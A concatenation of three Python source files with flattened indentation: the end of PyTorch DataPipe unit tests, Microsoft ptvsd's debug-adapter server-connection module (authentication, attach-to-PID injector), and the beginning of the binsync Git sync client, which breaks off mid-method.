input_dp3 = IDP(range(8, 12))
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [0, 4, 8, 1, 5, 9, 2, 6, 10, 3, 7, 11]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Test Case: Uneven input Data Pipes
input_dp1 = IDP([1, 2, 3, 4])
input_dp2 = IDP([10])
input_dp3 = IDP([100, 200, 300])
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [1, 10, 100, 2, 200, 3, 300, 4]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Test Case: Empty Data Pipe
input_dp1 = IDP([0, 1, 2, 3])
input_dp2 = IDP([])
output_dp = input_dp1.mux(input_dp2)
self.assertEqual(len(input_dp1), len(output_dp))
self.assertEqual(list(input_dp1), list(output_dp))
# Test Case: raises TypeError when __len__ is called and an input doesn't have __len__
input_dp1 = IDP(range(10))
input_dp_no_len = IDP_NoLen(range(10))
output_dp = input_dp1.mux(input_dp_no_len)
with self.assertRaises(TypeError):
len(output_dp)
# Metaclass conflict for Python 3.6
# Multiple inheritance with NamedTuple is not supported for Python 3.9
_generic_namedtuple_allowed = sys.version_info >= (3, 7) and sys.version_info < (3, 9)
if _generic_namedtuple_allowed:
class InvalidData(Generic[T_co], NamedTuple):
name: str
data: T_co
class TestTyping(TestCase):
def test_subtype(self):
from torch.utils.data._typing import issubtype
basic_type = (int, str, bool, float, complex,
list, tuple, dict, set, T_co)
for t in basic_type:
self.assertTrue(issubtype(t, t))
self.assertTrue(issubtype(t, Any))
if t == T_co:
self.assertTrue(issubtype(Any, t))
else:
self.assertFalse(issubtype(Any, t))
for t1, t2 in itertools.product(basic_type, basic_type):
if t1 == t2 or t2 == T_co:
self.assertTrue(issubtype(t1, t2))
else:
self.assertFalse(issubtype(t1, t2))
T = TypeVar('T', int, str)
S = TypeVar('S', bool, Union[str, int], Tuple[int, T]) # type: ignore[valid-type]
types = ((int, Optional[int]),
(List, Union[int, list]),
(Tuple[int, str], S),
(Tuple[int, str], tuple),
(T, S),
(S, T_co),
(T, Union[S, Set]))
for sub, par in types:
self.assertTrue(issubtype(sub, par))
self.assertFalse(issubtype(par, sub))
subscriptable_types = {
List: 1,
Tuple: 2, # use 2 parameters
Set: 1,
Dict: 2,
}
for subscript_type, n in subscriptable_types.items():
for ts in itertools.combinations(types, n):
subs, pars = zip(*ts)
sub = subscript_type[subs] # type: ignore[index]
par = subscript_type[pars] # type: ignore[index]
self.assertTrue(issubtype(sub, par))
self.assertFalse(issubtype(par, sub))
# Non-recursive check
self.assertTrue(issubtype(par, sub, recursive=False))
def test_issubinstance(self):
from torch.utils.data._typing import issubinstance
basic_data = (1, '1', True, 1., complex(1., 0.))
basic_type = (int, str, bool, float, complex)
S = TypeVar('S', bool, Union[str, int])
for d in basic_data:
self.assertTrue(issubinstance(d, Any))
self.assertTrue(issubinstance(d, T_co))
if type(d) in (bool, int, str):
self.assertTrue(issubinstance(d, S))
else:
self.assertFalse(issubinstance(d, S))
for t in basic_type:
if type(d) == t:
self.assertTrue(issubinstance(d, t))
else:
self.assertFalse(issubinstance(d, t))
# list/set
dt = (([1, '1', 2], List), (set({1, '1', 2}), Set))
for d, t in dt:
self.assertTrue(issubinstance(d, t))
self.assertTrue(issubinstance(d, t[T_co])) # type: ignore[index]
self.assertFalse(issubinstance(d, t[int])) # type: ignore[index]
# dict
d = dict({'1': 1, '2': 2.})
self.assertTrue(issubinstance(d, Dict))
self.assertTrue(issubinstance(d, Dict[str, T_co]))
self.assertFalse(issubinstance(d, Dict[str, int]))
# tuple
d = (1, '1', 2)
self.assertTrue(issubinstance(d, Tuple))
self.assertTrue(issubinstance(d, Tuple[int, str, T_co]))
self.assertFalse(issubinstance(d, Tuple[int, Any]))
self.assertFalse(issubinstance(d, Tuple[int, int, int]))
# Static checking annotation
def test_compile_time(self):
with self.assertRaisesRegex(TypeError, r"Expected 'Iterator' as the return"):
class InvalidDP1(IterDataPipe[int]):
def __iter__(self) -> str: # type: ignore[misc, override]
yield 0
with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
class InvalidDP2(IterDataPipe[Tuple]):
def __iter__(self) -> Iterator[int]: # type: ignore[override]
yield 0
with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
class InvalidDP3(IterDataPipe[Tuple[int, str]]):
def __iter__(self) -> Iterator[tuple]: # type: ignore[override]
yield (0, )
if _generic_namedtuple_allowed:
with self.assertRaisesRegex(TypeError, r"is not supported by Python typing"):
class InvalidDP4(IterDataPipe["InvalidData[int]"]): # type: ignore[type-arg, misc]
pass
class DP1(IterDataPipe[Tuple[int, str]]):
def __init__(self, length):
self.length = length
def __iter__(self) -> Iterator[Tuple[int, str]]:
for d in range(self.length):
yield d, str(d)
self.assertTrue(issubclass(DP1, IterDataPipe))
dp1 = DP1(10)
self.assertTrue(DP1.type.issubtype(dp1.type) and dp1.type.issubtype(DP1.type))
dp2 = DP1(5)
self.assertEqual(dp1.type, dp2.type)
with self.assertRaisesRegex(TypeError, r"is not a generic class"):
class InvalidDP5(DP1[tuple]): # type: ignore[type-arg]
def __iter__(self) -> Iterator[tuple]: # type: ignore[override]
yield (0, )
class DP2(IterDataPipe[T_co]):
def __iter__(self) -> Iterator[T_co]:
for d in range(10):
yield d # type: ignore[misc]
self.assertTrue(issubclass(DP2, IterDataPipe))
dp1 = DP2() # type: ignore[assignment]
self.assertTrue(DP2.type.issubtype(dp1.type) and dp1.type.issubtype(DP2.type))
dp2 = DP2() # type: ignore[assignment]
self.assertEqual(dp1.type, dp2.type)
class DP3(IterDataPipe[Tuple[T_co, str]]):
r""" DataPipe without fixed type with __init__ function"""
def __init__(self, datasource):
self.datasource = datasource
def __iter__(self) -> Iterator[Tuple[T_co, str]]:
for d in self.datasource:
yield d, str(d)
self.assertTrue(issubclass(DP3, IterDataPipe))
dp1 = DP3(range(10)) # type: ignore[assignment]
self.assertTrue(DP3.type.issubtype(dp1.type) and dp1.type.issubtype(DP3.type))
dp2 = DP3(5) # type: ignore[assignment]
self.assertEqual(dp1.type, dp2.type)
class DP4(IterDataPipe[tuple]):
r""" DataPipe without __iter__ annotation"""
def __iter__(self):
raise NotImplementedError
self.assertTrue(issubclass(DP4, IterDataPipe))
dp = DP4()
self.assertTrue(dp.type.param == tuple)
class DP5(IterDataPipe):
r""" DataPipe without type annotation"""
def __iter__(self) -> Iterator[str]:
raise NotImplementedError
self.assertTrue(issubclass(DP5, IterDataPipe))
dp = DP5() # type: ignore[assignment]
from torch.utils.data._typing import issubtype
self.assertTrue(issubtype(dp.type.param, Any) and issubtype(Any, dp.type.param))
class DP6(IterDataPipe[int]):
r""" DataPipe with plain Iterator"""
def __iter__(self) -> Iterator:
raise NotImplementedError
self.assertTrue(issubclass(DP6, IterDataPipe))
dp = DP6() # type: ignore[assignment]
self.assertTrue(dp.type.param == int)
class DP7(IterDataPipe[Awaitable[T_co]]):
r""" DataPipe with abstract base class"""
self.assertTrue(issubclass(DP7, IterDataPipe))
self.assertTrue(DP7.type.param == Awaitable[T_co])
class DP8(DP7[str]):
r""" DataPipe subclass from a DataPipe with abc type"""
self.assertTrue(issubclass(DP8, IterDataPipe))
self.assertTrue(DP8.type.param == Awaitable[str])
def test_construct_time(self):
class DP0(IterDataPipe[Tuple]):
@argument_validation
def __init__(self, dp: IterDataPipe):
self.dp = dp
def __iter__(self) -> Iterator[Tuple]:
for d in self.dp:
yield d, str(d)
class DP1(IterDataPipe[int]):
@argument_validation
def __init__(self, dp: IterDataPipe[Tuple[int, str]]):
self.dp = dp
def __iter__(self) -> Iterator[int]:
for a, b in self.dp:
yield a
# Non-DataPipe input with DataPipe hint
datasource = [(1, '1'), (2, '2'), (3, '3')]
with self.assertRaisesRegex(TypeError, r"Expected argument 'dp' as a IterDataPipe"):
dp = DP0(datasource)
dp = DP0(IDP(range(10)))
with self.assertRaisesRegex(TypeError, r"Expected type of argument 'dp' as a subtype"):
dp = DP1(dp)
def test_runtime(self):
class DP(IterDataPipe[Tuple[int, T_co]]):
def __init__(self, datasource):
self.ds = datasource
@runtime_validation
def __iter__(self) -> Iterator[Tuple[int, T_co]]:
for d in self.ds:
yield d
dss = ([(1, '1'), (2, '2')],
[(1, 1), (2, '2')])
for ds in dss:
dp = DP(ds) # type: ignore[var-annotated]
self.assertEqual(list(dp), ds)
# Reset __iter__
self.assertEqual(list(dp), ds)
dss = ([(1, 1), ('2', 2)], # type: ignore[assignment, list-item]
[[1, '1'], [2, '2']], # type: ignore[list-item]
[1, '1', 2, '2'])
for ds in dss:
dp = DP(ds)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp)
with runtime_validation_disabled():
self.assertEqual(list(dp), ds)
with runtime_validation_disabled():
self.assertEqual(list(dp), ds)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp)
def test_reinforce(self):
T = TypeVar('T', int, str)
class DP(IterDataPipe[T]):
def __init__(self, ds):
self.ds = ds
@runtime_validation
def __iter__(self) -> Iterator[T]:
for d in self.ds:
yield d
ds = list(range(10))
# Valid type reinforcement
dp = DP(ds).reinforce_type(int)
self.assertTrue(dp.type, int)
self.assertEqual(list(dp), ds)
# Invalid type
with self.assertRaisesRegex(TypeError, r"'expected_type' must be a type"):
dp = DP(ds).reinforce_type(1)
# Type is not subtype
with self.assertRaisesRegex(TypeError, r"Expected 'expected_type' as subtype of"):
dp = DP(ds).reinforce_type(float)
# Invalid data at runtime
dp = DP(ds).reinforce_type(str)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp)
# Context Manager to disable the runtime validation
with runtime_validation_disabled():
self.assertEqual(list(d for d in dp), ds)
class NumbersDataset(IterDataPipe):
def __init__(self, size=10):
self.size = size
def __iter__(self):
for i in range(self.size):
yield i
class TestGraph(TestCase):
@skipIfNoDill
def test_simple_traverse(self):
numbers_dp = NumbersDataset(size=50)
mapped_dp = numbers_dp.map(lambda x: x * 10)
graph = torch.utils.data.graph.traverse(mapped_dp)
expected: Dict[Any, Any] = {mapped_dp: {numbers_dp: {}}}
self.assertEqual(expected, graph)
@skipIfNoDill
def test_traverse_forked(self):
numbers_dp = NumbersDataset(size=50)
dp0, dp1, dp2 = numbers_dp.fork(num_instances=3)
dp0_upd = dp0.map(lambda x: x * 10)
dp1_upd = dp1.filter(lambda x: x % 3 == 1)
combined_dp = dp0_upd.mux(dp1_upd, dp2)
graph = torch.utils.data.graph.traverse(combined_dp)
expected = {combined_dp: {dp0_upd: {dp0: {dp0.main_datapipe: {dp0.main_datapipe.main_datapipe: {}}}},
dp1_upd: {dp1: {dp1.main_datapipe: {dp1.main_datapipe.main_datapipe: {}}}},
dp2: {dp2.main_datapipe: {dp2.main_datapipe.main_datapipe: {}}}}}
self.assertEqual(expected, graph)
class TestSharding(TestCase):
def _get_pipeline(self):
numbers_dp = NumbersDataset(size=10)
dp0, dp1 = numbers_dp.fork(num_instances=2)
dp0_upd = dp0.map(lambda x: x * 10)
dp1_upd = dp1.filter(lambda x: x % 3 == 1)
combined_dp = dp0_upd.mux(dp1_upd)
return combined_dp
@skipIfNoDill
def test_simple_sharding(self):
sharded_dp = self._get_pipeline().sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp, 3, 1)
items = list(sharded_dp)
self.assertEqual([1, 20, 40, 70], items)
all_items = list(self._get_pipeline())
items = []
for i in range(3):
sharded_dp = self._get_pipeline().sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp, 3, i)
items += list(sharded_dp)
self.assertEqual(sorted(all_items), sorted(items))
def test_sharding_length(self):
numbers_dp = IDP(range(13))
sharded_dp0 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp0, 3, 0)
sharded_dp1 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp1, 3, 1)
sharded_dp2 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp2, 3, 2)
self.assertEqual(13, len(numbers_dp))
self.assertEqual(5, len(sharded_dp0))
self.assertEqual(4, len(sharded_dp1))
self.assertEqual(4, len(sharded_dp2))
numbers_dp = IDP(range(1))
sharded_dp0 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp0, 2, 0)
sharded_dp1 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp1, 2, 1)
self.assertEqual(1, len(sharded_dp0))
self.assertEqual(0, len(sharded_dp1))
@skipIfNoDill
def test_old_dataloader(self):
dp = self._get_pipeline()
expected = list(dp)
dp = self._get_pipeline().sharding_filter()
dl = DataLoader(dp, batch_size=1, shuffle=False, num_workers=2,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
items = []
for i in dl:
items.append(i)
self.assertEqual(sorted(expected), sorted(items))
if __name__ == '__main__':
run_tests()
|
servers.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import functools
import os
import subprocess
import sys
import threading
import time
import ptvsd
from ptvsd import adapter
from ptvsd.common import compat, fmt, json, log, messaging, sockets
from ptvsd.adapter import components
access_token = None
"""Access token used to authenticate with the servers."""
_lock = threading.RLock()
_connections = []
"""All servers that are connected to this adapter, in order in which they connected.
"""
_connections_changed = threading.Event()
class Connection(sockets.ClientConnection):
"""A debug server that is connected to the adapter.
Servers that are not participating in a debug session are managed directly by the
corresponding Connection instance.
Servers that are participating in a debug session are managed by that session's
Server component instance, but the Connection object remains, and takes over again
once the session ends.
"""
def __init__(self, sock):
from ptvsd.adapter import sessions
self.disconnected = False
self.server = None
"""The Server component, if this debug server belongs to Session.
"""
self.pid = None
stream = messaging.JsonIOStream.from_socket(sock, str(self))
self.channel = messaging.JsonMessageChannel(stream, self)
self.channel.start()
try:
self.authenticate()
info = self.channel.request("pydevdSystemInfo")
process_info = info("process", json.object())
self.pid = process_info("pid", int)
self.ppid = process_info("ppid", int, optional=True)
if self.ppid == ():
self.ppid = None
self.channel.name = stream.name = str(self)
ptvsd_dir = os.path.dirname(os.path.dirname(ptvsd.__file__))
# Note: we must check if 'ptvsd' is not already in sys.modules because the
# evaluation of an import at the wrong time could deadlock Python due to
# its import lock.
#
# So, in general this evaluation shouldn't do anything. It's only
# important when pydevd attaches automatically to a subprocess. In this
# case, we have to make sure that ptvsd is properly put back in the game
# for users to be able to use it.
#
# In this case (when the import is needed), this evaluation *must* be done
# before the configurationDone request is sent -- if this is not respected
# it's possible that pydevd already started secondary threads to handle
# commands, in which case it's very likely that this command would be
# evaluated at the wrong thread and the import could potentially deadlock
# the program.
#
# Note 2: the sys module is guaranteed to be in the frame globals and
# doesn't need to be imported.
inject_ptvsd = """
if 'ptvsd' not in sys.modules:
sys.path.insert(0, {ptvsd_dir!r})
try:
import ptvsd
finally:
del sys.path[0]
"""
inject_ptvsd = fmt(inject_ptvsd, ptvsd_dir=ptvsd_dir)
try:
self.channel.request("evaluate", {"expression": inject_ptvsd})
except messaging.MessageHandlingError:
# Failure to inject is not a fatal error - such a subprocess can
# still be debugged, it just won't support "import ptvsd" in user
# code - so don't terminate the session.
log.exception("Failed to inject ptvsd into {0}:", self, level="warning")
with _lock:
# The server can disconnect concurrently before we get here, e.g. if
# it was force-killed. If the disconnect() handler has already run,
# don't register this server or report it, since there would be nothing to
# deregister it later.
if self.disconnected:
return
if any(conn.pid == self.pid for conn in _connections):
raise KeyError(
fmt("{0} is already connected to this adapter", self)
)
_connections.append(self)
_connections_changed.set()
except Exception:
log.exception("Failed to accept incoming server connection:")
self.channel.close()
# If this was the first server to connect, and the main thread is inside
# wait_until_disconnected(), we want to unblock it and allow it to exit.
dont_wait_for_first_connection()
# If we couldn't retrieve all the necessary info from the debug server,
# or there's a PID clash, we don't want to track this debuggee anymore,
# but we want to continue accepting connections.
return
parent_session = sessions.get(self.ppid)
if parent_session is None:
log.info("No active debug session for parent process of {0}.", self)
else:
try:
parent_session.ide.notify_of_subprocess(self)
except Exception:
# This might fail if the IDE concurrently disconnects from the parent
# session. We still want to keep the connection around, in case the
# IDE reconnects later. If the parent session was "launch", it'll take
# care of closing the remaining server connections.
log.exception("Failed to notify parent session about {0}:", self)
def __str__(self):
return "Server" + fmt("[?]" if self.pid is None else "[pid={0}]", self.pid)
def authenticate(self):
if access_token is None and adapter.access_token is None:
return
auth = self.channel.request(
"pydevdAuthorize", {"debugServerAccessToken": access_token}
)
if auth["clientAccessToken"] != adapter.access_token:
self.channel.close()
raise RuntimeError('Mismatched "clientAccessToken"; server not authorized.')
def request(self, request):
raise request.isnt_valid(
"Requests from the debug server to the IDE are not allowed."
)
def event(self, event):
pass
def terminated_event(self, event):
self.channel.close()
def disconnect(self):
with _lock:
self.disconnected = True
if self.server is not None:
# If the disconnect happened while Server was being instantiated,
# we need to tell it, so that it can clean up via Session.finalize().
# It will also take care of deregistering the connection in that case.
self.server.disconnect()
elif self in _connections:
_connections.remove(self)
_connections_changed.set()
def attach_to_session(self, session):
"""Attaches this server to the specified Session as a Server component.
Raises ValueError if the server already belongs to some session.
"""
with _lock:
if self.server is not None:
raise ValueError
log.info("Attaching {0} to {1}", self, session)
self.server = Server(session, self)
class Server(components.Component):
"""Handles the debug server side of a debug session."""
message_handler = components.Component.message_handler
class Capabilities(components.Capabilities):
PROPERTIES = {
"supportsCompletionsRequest": False,
"supportsConditionalBreakpoints": False,
"supportsConfigurationDoneRequest": False,
"supportsDataBreakpoints": False,
"supportsDelayedStackTraceLoading": False,
"supportsDisassembleRequest": False,
"supportsEvaluateForHovers": False,
"supportsExceptionInfoRequest": False,
"supportsExceptionOptions": False,
"supportsFunctionBreakpoints": False,
"supportsGotoTargetsRequest": False,
"supportsHitConditionalBreakpoints": False,
"supportsLoadedSourcesRequest": False,
"supportsLogPoints": False,
"supportsModulesRequest": False,
"supportsReadMemoryRequest": False,
"supportsRestartFrame": False,
"supportsRestartRequest": False,
"supportsSetExpression": False,
"supportsSetVariable": False,
"supportsStepBack": False,
"supportsStepInTargetsRequest": False,
"supportsTerminateDebuggee": False,
"supportsTerminateRequest": False,
"supportsTerminateThreadsRequest": False,
"supportsValueFormattingOptions": False,
"exceptionBreakpointFilters": [],
"additionalModuleColumns": [],
"supportedChecksumAlgorithms": [],
}
def __init__(self, session, connection):
assert connection.server is None
with session:
assert not session.server
super(Server, self).__init__(session, channel=connection.channel)
self.connection = connection
assert self.session.pid is None
if self.session.launcher and self.session.launcher.pid != self.pid:
log.info(
"Launcher reported PID={0}, but server reported PID={1}",
self.session.launcher.pid,
self.pid,
)
self.session.pid = self.pid
session.server = self
@property
def pid(self):
"""Process ID of the debuggee process, as reported by the server."""
return self.connection.pid
@property
def ppid(self):
"""Parent process ID of the debuggee process, as reported by the server."""
return self.connection.ppid
def initialize(self, request):
assert request.is_request("initialize")
self.connection.authenticate()
request = self.channel.propagate(request)
request.wait_for_response()
self.capabilities = self.Capabilities(self, request.response)
# Generic request handler, used if there's no specific handler below.
@message_handler
def request(self, request):
# Do not delegate requests from the server by default. There is a security
# boundary between the server and the adapter, and we cannot trust arbitrary
# requests sent over that boundary, since they may contain arbitrary code
# that the IDE will execute - e.g. "runInTerminal". The adapter must only
# propagate requests that it knows are safe.
raise request.isnt_valid(
"Requests from the debug server to the IDE are not allowed."
)
# Generic event handler, used if there's no specific handler below.
@message_handler
def event(self, event):
self.ide.propagate_after_start(event)
@message_handler
def initialized_event(self, event):
# pydevd doesn't send it, but the adapter will send its own in any case.
pass
@message_handler
def process_event(self, event):
# If there is a launcher, it's handling the process event.
if not self.launcher:
self.ide.propagate_after_start(event)
@message_handler
def continued_event(self, event):
# https://github.com/microsoft/ptvsd/issues/1530
#
# DAP specification says that a step request implies that only the thread on
# which that step occurred is resumed for the duration of the step. However,
# for VS compatibility, pydevd can operate in a mode that resumes all threads
# instead. This is set according to the value of "steppingResumesAllThreads"
# in "launch" or "attach" request, which defaults to true. If explicitly set
# to false, pydevd will only resume the thread that was stepping.
#
# To ensure that the IDE is aware that other threads are getting resumed in
# that mode, pydevd sends a "continued" event with "allThreadsResumed": true
# when responding to a step request. This ensures correct behavior in VSCode
# and other DAP-conformant clients.
#
# On the other hand, VS does not follow the DAP specification in this regard.
# When it requests a step, it assumes that all threads will be resumed, and
# does not expect to see "continued" events explicitly reflecting that fact.
# If such events are sent regardless, VS behaves erratically. Thus, we have
# to suppress them specifically for VS.
if self.ide.client_id not in ("visualstudio", "vsformac"):
self.ide.propagate_after_start(event)
@message_handler
def exited_event(self, event):
# If there is a launcher, it's handling the exit code.
if not self.launcher:
self.ide.propagate_after_start(event)
@message_handler
def terminated_event(self, event):
# Do not propagate this, since we'll report our own.
self.channel.close()
def detach_from_session(self):
with _lock:
self.is_connected = False
self.channel.handlers = self.connection
self.channel.name = self.channel.stream.name = str(self.connection)
self.connection.server = None
def disconnect(self):
with _lock:
_connections.remove(self.connection)
_connections_changed.set()
super(Server, self).disconnect()
listen = functools.partial(Connection.listen, name="Server")
def stop_listening():
try:
Connection.listener.close()
except Exception:
log.exception(level="warning")
def connections():
with _lock:
return list(_connections)
def wait_for_connection(session, predicate, timeout=None):
"""Waits until there is a server with the specified PID connected to this adapter,
and returns the corresponding Connection.
If there is more than one server connection already available, returns the oldest
one.
"""
def wait_for_timeout():
time.sleep(timeout)
wait_for_timeout.timed_out = True
with _lock:
_connections_changed.set()
wait_for_timeout.timed_out = timeout == 0
if timeout:
thread = threading.Thread(
target=wait_for_timeout, name="servers.wait_for_connection() timeout"
)
thread.daemon = True
thread.start()
if timeout != 0:
log.info("{0} waiting for connection from debug server...", session)
while True:
with _lock:
_connections_changed.clear()
conns = (conn for conn in _connections if predicate(conn))
conn = next(conns, None)
if conn is not None or wait_for_timeout.timed_out:
return conn
_connections_changed.wait()
def wait_until_disconnected():
"""Blocks until all debug servers disconnect from the adapter.
If there are no server connections, waits until at least one is established first,
before waiting for it to disconnect.
"""
while True:
_connections_changed.wait()
with _lock:
_connections_changed.clear()
if not len(_connections):
return
def dont_wait_for_first_connection():
"""Unblocks any pending wait_until_disconnected() call that is waiting on the
first server to connect.
"""
with _lock:
_connections_changed.set()
def inject(pid, ptvsd_args):
host, port = Connection.listener.getsockname()
cmdline = [
sys.executable,
compat.filename(os.path.dirname(ptvsd.__file__)),
"--client",
"--host",
host,
"--port",
str(port),
]
if adapter.access_token is not None:
cmdline += ["--client-access-token", adapter.access_token]
cmdline += ptvsd_args
cmdline += ["--pid", str(pid)]
log.info("Spawning attach-to-PID debugger injector: {0!r}", cmdline)
try:
injector = subprocess.Popen(
cmdline,
bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
except Exception as exc:
log.exception("Failed to inject debug server into process with PID={0}", pid)
raise messaging.MessageHandlingError(
fmt(
"Failed to inject debug server into process with PID={0}: {1}", pid, exc
)
)
# We need to capture the output of the injector - otherwise it can get blocked
# on a write() syscall when it tries to print something.
def capture_output():
while True:
line = injector.stdout.readline()
if not line:
break
log.info("Injector[PID={0}] output:\n{1}", pid, line.rstrip())
log.info("Injector[PID={0}] exited.", pid)
thread = threading.Thread(
target=capture_output, name=fmt("Injector[PID={0}] output", pid)
)
thread.daemon = True
thread.start()
|
client.py
|
import time
import threading
import os
import subprocess
import re
import datetime
import logging
import typing
import git
import git.exc
import filelock
from .data import User, Function, Struct, Patch
from .state import State
from .errors import MetadataNotFoundError, ExternalUserCommitError
_l = logging.getLogger(name=__name__)
BINSYNC_BRANCH_PREFIX = 'binsync'
BINSYNC_ROOT_BRANCH = f'{BINSYNC_BRANCH_PREFIX}/__root__'
class ConnectionWarnings:
HASH_MISMATCH = 0
class StateContext(object):
def __init__(self, client, state, locked=False):
self.client = client
self.state = state
self.locked = locked
def __enter__(self):
if self.locked:
self.client.commit_lock.acquire()
return self.state
def __exit__(self, exc_type, exc_val, exc_tb):
if self.locked:
self.client.commit_lock.release()
self.client.commit_state(state=self.state)
class Client(object):
"""
The binsync Client.
:ivar str master_user: User name of the master user.
:ivar str repo_root: Local path of the Git repo.
:ivar str remote: Git remote.
:ivar int _commit_interval: The interval for committing local changes into the Git repo, pushing to the remote
side, and pulling from the remote.
"""
def __init__(
self,
master_user,
repo_root,
binary_hash,
remote="origin",
commit_interval=10,
init_repo=False,
remote_url=None,
ssh_agent_pid=None,
ssh_auth_sock=None
):
"""
:param str master_user: The username of the current user
:param str repo_root: The path to the repository directory to be loaded or created
:param str binary_hash: The binary's md5 hash, as a hex string, for validation
:param remote:
:param commit_interval:
:param init_repo:
:param remote_url:
:param ssh_agent_pid:
:param ssh_auth_sock:
"""
self.master_user = master_user
self.repo_root = repo_root
self.binary_hash = binary_hash
self.remote = remote
self.repo = None
self.repo_lock = None
if master_user.endswith('/') or '__root__' in master_user:
raise Exception(f"Bad username: {master_user}")
# ssh-agent info
self.ssh_agent_pid = ssh_agent_pid # type: int
self.ssh_auth_sock = ssh_auth_sock # type: str
self.connection_warnings = []
# three scenarios
# 1. We already have the repo checked out
# 2. We haven't checked out the repo, but there is a remote repo. In this case, we clone the repo from
# @remote_url
# 3. There is no such repo, and we are the very first group of people trying to set up this repo. In this case,
# @init_repo should be True, and we will initialize the repo.
try:
# case 1
# open the local repo
self.repo = git.Repo(self.repo_root)
# Initialize branches
self.init_remote()
if init_repo:
raise Exception("Could not initialize repository - it already exists!")
if not any(b.name == BINSYNC_ROOT_BRANCH for b in self.repo.branches):
raise Exception(f"This is not a binsync repo - it must have a {BINSYNC_ROOT_BRANCH} branch.")
except (git.NoSuchPathError, git.InvalidGitRepositoryError):
# initialization
if remote_url:
# case 2
self.repo = self.clone(remote_url)
elif init_repo:
# case 3
self.repo = git.Repo.init(self.repo_root)
self._setup_repo()
else:
raise
stored = self._get_stored_hash()
if stored != binary_hash:
self.connection_warnings.append(ConnectionWarnings.HASH_MISMATCH)
assert not self.repo.bare, "it should not be a bare repo"
self.repo_lock = filelock.FileLock(self.repo_root + "/.git/binsync.lock")
try:
self.repo_lock.acquire(timeout=0)
except filelock.Timeout as e:
raise Exception("Can only have one binsync client touching a local repository at once.\n"
"If the previous client crashed, you need to delete " + self.repo_root + "/.git/binsync.lock") from e
# check out the appropriate branch
try:
branch = next(o for o in self.repo.branches if o.name.endswith(self.user_branch_name))
except StopIteration:
branch = self.repo.create_head(self.user_branch_name, BINSYNC_ROOT_BRANCH)
else:
if branch.is_remote():
branch = self.repo.create_head(self.user_branch_name)
branch.checkout()
self._commit_interval = commit_interval
self._updater_thread = None
self._last_push_at = None # type: datetime.datetime
self.last_push_attempt_at = None # type: datetime.datetime
self._last_pull_at = None # type: datetime.datetime
self.last_pull_attempt_at = None # type: datetime.datetime
# timestamps
self._last_commit_ts = 0
self.state = None
self.commit_lock = threading.Lock()
def init_remote(self):
"""
Initialize GitPython's view of remote references in the repo.
"""
# get all remote branches
try:
branches = self.repo.remote().refs
except ValueError:
return
# track any remote we are not already tracking
for branch in branches:
if "HEAD" in branch.name:
continue
try:
self.repo.git.checkout('--track', branch.name)
except git.GitCommandError:
# the branch is most likely already tracked/checked out locally; ignore and continue
pass
def __del__(self):
if self.repo_lock is not None:
self.repo_lock.release()
@property
def user_branch_name(self):
return f"{BINSYNC_BRANCH_PREFIX}/{self.master_user}"
@property
def has_remote(self):
"""
If there is a remote configured for our local repo.
:return: True if there is a remote, False otherwise.
"""
return self.remote and self.repo.remotes and any(r.name == self.remote for r in self.repo.remotes)
@property
def last_update_timestamp(self):
return self._last_commit_ts
def ssh_agent_env(self):
if self.ssh_agent_pid is not None and self.ssh_auth_sock is not None:
env = {
'SSH_AGENT_PID': str(self.ssh_agent_pid),
'SSH_AUTH_SOCK': str(self.ssh_auth_sock),
}
else:
env = { }
return env
def add_remote(self, name, remote_url):
"""
Add a remote to the local repo.
:param name:
:param remote_url:
:return:
"""
self.repo.create_remote(name, url=remote_url)
def clone(self, remote_url):
"""
Clone from a remote_url to the local path specified by self.repo_root.
:param str remote_url: The URL of the Git remote.
:return: The cloned git.Repo.
"""
env = self.ssh_agent_env()
repo = git.Repo.clone_from(remote_url, self.repo_root, env=env)
try:
repo.create_head(BINSYNC_ROOT_BRANCH, f'{self.remote}/{BINSYNC_ROOT_BRANCH}')
except git.BadName:
raise Exception(f"This is not a binsync repo - it must have a {BINSYNC_ROOT_BRANCH} branch")
return repo
def checkout_to_master_user(self):
"""
Ensure the proper branch for the current user is checked out.
:return: None
"""
self.repo.git.checkout(self.user_branch_name)
def pull(self, print_error=False):
"""
Pull changes from the remote side.
:return: None
"""
self.last_pull_attempt_at = datetime.datetime.now()
self.checkout_to_master_user()
if self.has_remote:
try:
env = self.ssh_agent_env()
with self.repo.git.custom_environment(**env):
self.repo.remotes[self.remote].pull()
self._last_pull_at = datetime.datetime.now()
except git.exc.GitCommandError as ex:
if print_error:
print("Failed to pull from remote \"%s\".\n"
"\n"
"Git error: %s." % (
self.remote,
str(ex)
))
def push(self, print_error=False):
"""
Push local changes to the remote side.
:return: None
"""
self.last_push_attempt_at = datetime.datetime.now()
self.checkout_to_master_user()
if self.has_remote:
try:
env = self.ssh_agent_env()
with self.repo.git.custom_environment(**env):
self.repo.remotes[self.remote].push(BINSYNC_ROOT_BRANCH)
self.repo.remotes[self.remote].push(self.user_branch_name)
self._last_push_at = datetime.datetime.now()
except git.exc.GitCommandError as ex:
if print_error:
print("Failed to push to remote \"%s\".\n"
"Did you setup %s/master as the upstream of the local master branch?\n"
"\n"
"Git error: %s." % (
self.remote,
self.remote,
str(ex)
))
def users(self) -> typing.Iterable[User]:
for ref in self._get_best_refs():
try:
